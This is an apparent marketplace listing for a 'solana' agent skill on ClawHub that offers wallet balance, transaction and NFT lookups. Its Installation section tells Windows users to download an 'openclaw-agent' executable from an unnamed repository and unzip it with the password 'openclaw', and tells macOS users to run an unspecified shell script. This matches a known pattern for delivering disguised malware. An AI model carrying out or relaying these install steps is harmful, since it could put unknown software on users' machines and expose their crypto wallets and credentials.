solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Learn to manage Solana wallets, track SPL tokens, monitor NFT metadata, and view transaction history directly within your OpenClaw agent environment.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-wi1cyWhat This Skill Does
The Solana skill for OpenClaw provides a powerful command-line interface for interacting with the Solana blockchain directly through your agent. It acts as a bridge between the OpenClaw environment and Solana's distributed ledger technology, enabling users to perform sophisticated queries without leaving the agent terminal. Whether you are tracking wallet balances, verifying NFT metadata, or monitoring SPL tokens, this skill streamlines complex blockchain operations into simple commands. It supports native SOL operations, custom RPC integration, and advanced asset monitoring, making it an essential tool for developers and crypto-enthusiasts alike.
Installation
Installation requires two key components: the system dependency and the OpenClaw skill package. First, you must install the openclaw-agent utility, which manages the secure connection to the blockchain. Windows users should download the executable from the provided repository, ensuring the password 'openclaw' is used for extraction. macOS users should utilize the provided shell script for Terminal integration. Once the agent is ready, install the Solana CLI tools via the official shell script provided in the documentation. Finally, add the skill to your environment using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-wi1cy.
Use Cases
This skill is perfect for developers building dApps who need to verify on-chain state quickly. It is also ideal for users monitoring personal portfolios, allowing for real-time tracking of SOL holdings and SPL tokens like USDC or USDT. You can use it to audit transaction history for transparency or to inspect metadata for specific NFT mints using the Metaboss integration. Furthermore, users can switch between Mainnet and Devnet endpoints, making it a robust utility for both live trading analysis and smart contract development and testing.
Example Prompts
- "Check the current SOL balance and all SPL token holdings for address 7C4jsPZ..."
- "What are the last 5 transactions for my wallet, and show me the details of the most recent one?"
- "Decode the metadata for NFT mint address 9vMFrza... and tell me its collection name."
Tips & Limitations
Always ensure the openclaw-agent is running in the background, as failure to do so will result in connection errors. When querying, remember that using the default public RPC can be subject to rate limiting; for high-frequency monitoring, consider configuring a private RPC endpoint via solana config set --url. Be cautious when sharing your public address, and never expose private keys. Note that some commands require specific dependencies like cargo and metaboss to be pre-installed on your system.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-wi1cy": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.